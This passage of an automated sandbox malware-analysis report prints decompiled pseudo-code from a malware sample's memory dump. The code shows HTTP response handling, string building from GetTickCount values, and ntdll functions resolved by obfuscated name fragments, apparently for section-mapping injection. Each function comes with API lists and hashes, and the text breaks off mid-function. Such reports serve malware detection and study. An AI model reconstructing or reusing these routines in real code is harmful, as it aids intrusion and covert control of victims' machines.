                                                                                                                                  • API String ID: 909868375-0
                                                                                                                                  • Opcode ID: 3d807984be9d6bb2df6003a4d26d4d88c91a2463fac1afd7e3bf221db6938e08
                                                                                                                                  • Instruction ID: 6dfa2c8a0f64e67a01820d63bfd63d7e5a9f956585bf5902194ca58d945b89fd
                                                                                                                                  • Opcode Fuzzy Hash: 3d807984be9d6bb2df6003a4d26d4d88c91a2463fac1afd7e3bf221db6938e08
                                                                                                                                  • Instruction Fuzzy Hash: C0A170B1E00228DBDB24CF55DC81BEEB7B5EB44304F54819AE60967282D738AE84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                  			E022B8F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				void* __esi;
                                                                                                                                  				long _t43;
                                                                                                                                  				intOrPtr _t44;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				void* _t48;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t50;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t59;
                                                                                                                                  				void* _t60;
                                                                                                                                  				intOrPtr _t66;
                                                                                                                                  				void* _t71;
                                                                                                                                  				void* _t74;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t77;
                                                                                                                                  				intOrPtr _t79;
                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                  				intOrPtr _t91;
                                                                                                                                  
                                                                                                                                  				_t79 =  *0x22bd33c; // 0x4779798
                                                                                                                                  				_v24 = 8;
                                                                                                                                  				_t43 = GetTickCount();
                                                                                                                                  				_push(5);
                                                                                                                                  				_t74 = 0xa;
                                                                                                                                  				_v16 = _t43;
                                                                                                                                  				_t44 = E022B9B1B(_t74,  &_v16);
                                                                                                                                  				_v8 = _t44;
                                                                                                                                  				if(_t44 == 0) {
                                                                                                                                  					_v8 = 0x22bc18c;
                                                                                                                                  				}
                                                                                                                                  				_t46 = E022B7F8B(_t79);
                                                                                                                                  				_v12 = _t46;
                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                  					_t80 = __imp__;
                                                                                                                                  					_t48 =  *_t80(_v8, _t71);
                                                                                                                                  					_t49 =  *_t80(_v12);
                                                                                                                                  					_t50 =  *_t80(_a4);
                                                                                                                                  					_t54 = E022B1525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                  					_v20 = _t54;
                                                                                                                                  					if(_t54 != 0) {
                                                                                                                                  						_t75 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t16 = _t75 + 0x22beb08; // 0x530025
                                                                                                                                  						 *0x22bd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                  						_push(4);
                                                                                                                                  						_t77 = 5;
                                                                                                                                  						_t57 = E022B9B1B(_t77,  &_v16);
                                                                                                                                  						_v8 = _t57;
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_v8 = 0x22bc190;
                                                                                                                                  						}
                                                                                                                                  						_t58 =  *_t80(_v8);
                                                                                                                                  						_t59 =  *_t80(_v12);
                                                                                                                                  						_t60 =  *_t80(_a4);
                                                                                                                                  						_t91 = E022B1525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                  						if(_t91 == 0) {
                                                                                                                                  							E022B8B22(_v20);
                                                                                                                                  						} else {
                                                                                                                                  							_t66 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  							_t31 = _t66 + 0x22bec28; // 0x73006d
                                                                                                                                  							 *0x22bd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                  							 *_a16 = _v20;
                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                  							 *_a20 = _t91;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E022B8B22(_v12);
                                                                                                                                  				}
                                                                                                                                  				return _v24;
                                                                                                                                  			}





























                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 022B8F9A
                                                                                                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 022B8FDA
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 022B8FE3
                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 022B8FEA
                                                                                                                                  • lstrlenW.KERNEL32(80000002), ref: 022B8FF7
                                                                                                                                  • lstrlen.KERNEL32(?,00000004), ref: 022B9057
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 022B9060
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 022B9067
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 022B906E
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2535036572-0
                                                                                                                                  • Opcode ID: 782a33002dcd595cac8484a355f77a5f28980b58dfef09fa3396f63d7bd67418
                                                                                                                                  • Instruction ID: 741fae450cca97d0670da386c7bf2a21a6416f36447a4e75934b162f5456194a
                                                                                                                                  • Opcode Fuzzy Hash: 782a33002dcd595cac8484a355f77a5f28980b58dfef09fa3396f63d7bd67418
                                                                                                                                  • Instruction Fuzzy Hash: DD416772D1021AFBCF12AFE4DC489DEBBB5EF48384F014451EA04A7225DB319A60DF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BytesCheck$HeapPointerValid__free_base_memset
                                                                                                                                  • String ID: tDj
                                                                                                                                  • API String ID: 25084783-2513116121
                                                                                                                                  • Opcode ID: 71aa9a90eb5f64dacc70286fbac619a336f71b7ee24760cba3e339261cfa5227
                                                                                                                                  • Instruction ID: 5dd4d98ab5190a1095745a5b94f79f969744d1cbc82d9d8fcdafaa2f52b2d70b
                                                                                                                                  • Opcode Fuzzy Hash: 71aa9a90eb5f64dacc70286fbac619a336f71b7ee24760cba3e339261cfa5227
                                                                                                                                  • Instruction Fuzzy Hash: CB91E574B40204FBDB24CB85DD86FAA7366AB44704F344159F6046B3C2C279EE91CB9E
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425E0E
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425E38
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425E83
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::~_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1901436342-0
                                                                                                                                  • Opcode ID: 2f40e07e0bf703822dcd61d85a002d1bcbc9ca099beb512a7405501aa6d54e01
                                                                                                                                  • Instruction ID: 2bd9e11a0deec5aad687e469c1ff23c29a0ff68e06fdcd3bfe10575ba81f8d1a
                                                                                                                                  • Opcode Fuzzy Hash: 2f40e07e0bf703822dcd61d85a002d1bcbc9ca099beb512a7405501aa6d54e01
                                                                                                                                  • Instruction Fuzzy Hash: 20611A70A00119DFCB04DFA9D9949EEB7B1FF48304F21815EE815AB391DB38AE41DB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$0$9
                                                                                                                                  • API String ID: 3120068967-269856862
                                                                                                                                  • Opcode ID: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
                                                                                                                                  • Instruction ID: 8977922218446ab2660389953bacc8e2e3d6ab55067b3962a46a12034288b51d
                                                                                                                                  • Opcode Fuzzy Hash: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
                                                                                                                                  • Instruction Fuzzy Hash: DF4126B1E05228DFDB20CF58D889BAEB7B1FB84304F5481DAD449A7240C7389E91CF4A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B57DD(void* __ecx, void* __esi) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				long _t34;
                                                                                                                                  				long _t39;
                                                                                                                                  				long _t42;
                                                                                                                                  				long _t56;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t59;
                                                                                                                                  				void* _t61;
                                                                                                                                  
                                                                                                                                  				_t61 = __esi;
                                                                                                                                  				_t59 = __ecx;
                                                                                                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                  				do {
                                                                                                                                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                  					_v20 = _t34;
                                                                                                                                  					if(_t34 != 0) {
                                                                                                                                  						L3:
                                                                                                                                  						_v8 = 4;
                                                                                                                                  						_v16 = 0;
                                                                                                                                  						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                                                                                                                  							_t39 = GetLastError();
                                                                                                                                  							_v12 = _t39;
                                                                                                                                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                  								L15:
                                                                                                                                  								return _v12;
                                                                                                                                  							} else {
                                                                                                                                  								goto L11;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                                                                                                                  							goto L11;
                                                                                                                                  						} else {
                                                                                                                                  							_v16 = 0;
                                                                                                                                  							_v8 = 0;
                                                                                                                                  							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                  							_t58 = E022B1525(_v8 + 1);
                                                                                                                                  							if(_t58 == 0) {
                                                                                                                                  								_v12 = 8;
                                                                                                                                  							} else {
                                                                                                                                  								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                                                                                                                  									E022B8B22(_t58);
                                                                                                                                  									_v12 = GetLastError();
                                                                                                                                  								} else {
                                                                                                                                  									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                  									 *(_t61 + 0xc) = _t58;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L15;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					SetEvent( *(_t61 + 0x1c));
                                                                                                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                  					_v12 = _t56;
                                                                                                                                  					if(_t56 != 0) {
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  					goto L3;
                                                                                                                                  					L11:
                                                                                                                                  					_t42 = E022B29C0( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                  					_v12 = _t42;
                                                                                                                                  				} while (_t42 == 0);
                                                                                                                                  				goto L15;
                                                                                                                                  			}














                                                                                                                                  0x022b5888
                                                                                                                                  0x022b587f
                                                                                                                                  0x00000000
                                                                                                                                  0x022b586b
                                                                                                                                  0x022b5840
                                                                                                                                  0x022b5804
                                                                                                                                  0x022b580a
                                                                                                                                  0x022b580d
                                                                                                                                  0x022b5812
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022b58a2
                                                                                                                                  0x022b58aa
                                                                                                                                  0x022b58af
                                                                                                                                  0x022b58b2
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 022B57F4
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 022B5804
                                                                                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 022B5836
                                                                                                                                  • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B585B
                                                                                                                                  • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B587B
                                                                                                                                  • GetLastError.KERNEL32 ref: 022B588D
                                                                                                                                    • Part of subcall function 022B29C0: WaitForMultipleObjects.KERNEL32(00000002,022BA923,00000000,022BA923,?,?,?,022BA923,0000EA60), ref: 022B29DB
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 022B58C2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3369646462-0
                                                                                                                                  • Opcode ID: f2ead24e99b00b5c671e2c6870d5cfa91a143123e0e3b74903ce2e51b0f50feb
                                                                                                                                  • Instruction ID: 431767a50bd819ebcdb21c67e2aa7bcbe30d82f9cdf2ddce47331c1d3a71e7a0
                                                                                                                                  • Opcode Fuzzy Hash: f2ead24e99b00b5c671e2c6870d5cfa91a143123e0e3b74903ce2e51b0f50feb
                                                                                                                                  • Instruction Fuzzy Hash: 3B314FB5D10309EFDF22EFE4C8849DEB7F8EF08344F50496AE502A6154D7709A549F50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                  			E022B7B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _t9;
                                                                                                                                  				intOrPtr _t13;
                                                                                                                                  				char* _t28;
                                                                                                                                  				void* _t33;
                                                                                                                                  				void* _t34;
                                                                                                                                  				char* _t36;
                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                  				char* _t41;
                                                                                                                                  				char* _t42;
                                                                                                                                  				char* _t43;
                                                                                                                                  
                                                                                                                                  				_t34 = __edx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t9 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  				_t1 = _t9 + 0x22be62c; // 0x253d7325
                                                                                                                                  				_t36 = 0;
                                                                                                                                  				_t28 = E022BA055(__ecx, _t1);
                                                                                                                                  				if(_t28 != 0) {
                                                                                                                                  					_t40 = __imp__;
                                                                                                                                  					_t13 =  *_t40(_t28);
                                                                                                                                  					_v8 = _t13;
                                                                                                                                  					_t41 = E022B1525(_v8 +  *_t40(_a4) + 1);
                                                                                                                                  					if(_t41 != 0) {
                                                                                                                                  						strcpy(_t41, _t28);
                                                                                                                                  						_pop(_t33);
                                                                                                                                  						__imp__(_t41, _a4);
                                                                                                                                  						_t36 = E022B1188(_t34, _t41, _a8);
                                                                                                                                  						E022B8B22(_t41);
                                                                                                                                  						_t42 = E022B976F(StrTrimA(_t36, "="), _t36);
                                                                                                                                  						if(_t42 != 0) {
                                                                                                                                  							E022B8B22(_t36);
                                                                                                                                  							_t36 = _t42;
                                                                                                                                  						}
                                                                                                                                  						_t43 = E022BA41C(_t36, _t33);
                                                                                                                                  						if(_t43 != 0) {
                                                                                                                                  							E022B8B22(_t36);
                                                                                                                                  							_t36 = _t43;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E022B8B22(_t28);
                                                                                                                                  				}
                                                                                                                                  				return _t36;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022BA055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,022B7BA7,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?), ref: 022BA0BC
                                                                                                                                    • Part of subcall function 022BA055: sprintf.NTDLL ref: 022BA0DD
                                                                                                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,022B9DA0,?,047795B0), ref: 022B7BB8
                                                                                                                                  • lstrlen.KERNEL32(?,?,?,022B9DA0,?,047795B0), ref: 022B7BC0
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • strcpy.NTDLL ref: 022B7BD7
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 022B7BE2
                                                                                                                                    • Part of subcall function 022B1188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,022B7BF1,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B119F
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B7BFF
                                                                                                                                    • Part of subcall function 022B976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,022B7C0B,00000000,?,?,022B9DA0,?,047795B0), ref: 022B9779
                                                                                                                                    • Part of subcall function 022B976F: _snprintf.NTDLL ref: 022B97D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                  • String ID: =
                                                                                                                                  • API String ID: 2864389247-1428090586
                                                                                                                                  • Opcode ID: bc9851dd03170e67e77fce5c59531e306c516d181721ef2355b4f6516df3280b
                                                                                                                                  • Instruction ID: 03b0b66c707e13ae7f3812a1e151a3492adec3ab538d8709cff5e3e816bc5a65
                                                                                                                                  • Opcode Fuzzy Hash: bc9851dd03170e67e77fce5c59531e306c516d181721ef2355b4f6516df3280b
                                                                                                                                  • Instruction Fuzzy Hash: 7B11C1739213266B47137FF4AC48CEEBAAEDE88BD03150515F504E7108DF24D9024BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 022B94A4
                                                                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 022B94B8
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 022B94CA
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B9532
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B9541
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 022B954C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 345ee512872c6a0513b84ba6dad5941def561bec13d0459c37cba93c8424c909
                                                                                                                                  • Instruction ID: 189d41def1d2386a196829e74235aa9e532ad590b66e6625abe8ce05b0182a58
                                                                                                                                  • Opcode Fuzzy Hash: 345ee512872c6a0513b84ba6dad5941def561bec13d0459c37cba93c8424c909
                                                                                                                                  • Instruction Fuzzy Hash: BD416F35D50609AFDB02DFF8D8446DEB7BAAF49300F144426EA10EB210DB71D945CF91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B4944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _t23;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				_Unknown_base(*)()* _t28;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				_Unknown_base(*)()* _t32;
                                                                                                                                  				intOrPtr _t33;
                                                                                                                                  				_Unknown_base(*)()* _t35;
                                                                                                                                  				intOrPtr _t36;
                                                                                                                                  				_Unknown_base(*)()* _t38;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  				_Unknown_base(*)()* _t41;
                                                                                                                                  				intOrPtr _t44;
                                                                                                                                  				struct HINSTANCE__* _t48;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  
                                                                                                                                  				_t54 = E022B1525(0x20);
                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                  					_v8 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t23 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t1 = _t23 + 0x22be11a; // 0x4c44544e
                                                                                                                                  					_t48 = GetModuleHandleA(_t1);
                                                                                                                                  					_t26 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t2 = _t26 + 0x22be769; // 0x7243775a
                                                                                                                                  					_v8 = 0x7f;
                                                                                                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                  					 *(_t54 + 0xc) = _t28;
                                                                                                                                  					if(_t28 == 0) {
                                                                                                                                  						L8:
                                                                                                                                  						E022B8B22(_t54);
                                                                                                                                  					} else {
                                                                                                                                  						_t30 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  						_t5 = _t30 + 0x22be756; // 0x614d775a
                                                                                                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                  						 *(_t54 + 0x10) = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							goto L8;
                                                                                                                                  						} else {
                                                                                                                                  							_t33 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  							_t7 = _t33 + 0x22be40b; // 0x6e55775a
                                                                                                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                  							 *(_t54 + 0x14) = _t35;
                                                                                                                                  							if(_t35 == 0) {
                                                                                                                                  								goto L8;
                                                                                                                                  							} else {
                                                                                                                                  								_t36 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  								_t9 = _t36 + 0x22be4d2; // 0x4e6c7452
                                                                                                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                  								 *(_t54 + 0x18) = _t38;
                                                                                                                                  								if(_t38 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									_t39 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  									_t11 = _t39 + 0x22be779; // 0x6c43775a
                                                                                                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                  									 *(_t54 + 0x1c) = _t41;
                                                                                                                                  									if(_t41 == 0) {
                                                                                                                                  										goto L8;
                                                                                                                                  									} else {
                                                                                                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                  										_t44 = E022B5CD1(_t54, _a8);
                                                                                                                                  										_v8 = _t44;
                                                                                                                                  										if(_t44 != 0) {
                                                                                                                                  											goto L8;
                                                                                                                                  										} else {
                                                                                                                                  											 *_a12 = _t54;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022B34A1,?,00000001,?,?,00000000,00000000), ref: 022B4969
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 022B498B
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 022B49A1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 022B49B7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 022B49CD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 022B49E3
                                                                                                                                    • Part of subcall function 022B5CD1: memset.NTDLL ref: 022B5D50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1886625739-0
                                                                                                                                  • Opcode ID: 44a448861f4fb351a0760bbe6b625d908d6be5365b7d1f95127af3d2b3fd4f06
                                                                                                                                  • Instruction ID: 897adfcf400c41a9d088281bc0bacaa97a6e718176b2996c0605b358ff650680
                                                                                                                                  • Opcode Fuzzy Hash: 44a448861f4fb351a0760bbe6b625d908d6be5365b7d1f95127af3d2b3fd4f06
                                                                                                                                  • Instruction Fuzzy Hash: 2B2171B095020AAFD712EFE9DC94DEAB7ECEF053447010425E905D7212E774E904DB64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E022B4B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int* _v16;
                                                                                                                                  				char _v284;
                                                                                                                                  				void* __esi;
                                                                                                                                  				char* _t59;
                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				char _t65;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t69;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  				void* _t73;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  				char _t98;
                                                                                                                                  				signed int* _t100;
                                                                                                                                  				intOrPtr* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  
                                                                                                                                  				_t92 = __ecx;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				_t98 = _a16;
                                                                                                                                  				if(_t98 == 0) {
                                                                                                                                  					__imp__( &_v284,  *0x22bd33c);
                                                                                                                                  					_t91 = 0x80000002;
                                                                                                                                  					L6:
                                                                                                                                  					_t59 = E022B7B3B( &_v284,  &_v284);
                                                                                                                                  					_a8 = _t59;
                                                                                                                                  					if(_t59 == 0) {
                                                                                                                                  						_v8 = 8;
